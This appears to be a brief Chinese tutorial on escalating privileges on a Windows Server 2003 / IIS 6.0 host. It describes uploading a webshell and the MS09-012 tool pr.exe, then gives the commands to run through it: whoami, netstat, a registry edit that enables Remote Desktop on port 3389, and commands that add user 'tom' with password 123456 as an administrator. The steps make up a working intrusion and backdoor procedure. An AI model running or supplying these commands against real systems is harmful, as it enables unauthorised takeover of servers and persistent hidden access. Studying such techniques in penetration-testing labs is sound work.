操作系统: Microsoft Windows Server 2003
Web服务器: IIS V6.0
第一步,将大马文件上传至服务器根目录
第二步,访问大马文件,进入大马的控制界面
第三步,查看漏洞补丁信息
第四步,上传漏洞工具
将提权工具( 此处使用MS09-012漏洞工具 )上传到系统中,windows系统的回收站和c:\windows\Temp目录默认具有上传和执行的权限
第五步,利用工具进行提权
payload
/c c:\windows\temp\pr.exe "whoami"
第六步,开启远程桌面端口
命令行查看是否开启3389( 远程桌面 )端口
/c c:\windows\temp\pr.exe "netstat -ano"
上传a.bat文件至c:\windows\temp目录下,内容为开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
执行a.bat文件,开启3389端口
/c c:\windows\temp\pr.exe "c:\windows\temp\a.bat"
查看3389是否开启成功
/c c:\windows\temp\pr.exe "netstat -ano"
第七步,添加管理员权限用户
添加普通用户tom
/c c:\windows\temp\pr.exe "net user tom 123456 /add"
将tom添加至administrators,拥有管理员权限
/c c:\windows\temp\pr.exe "net localgroup administrators tom /add"
第八步,物理机连接远程桌面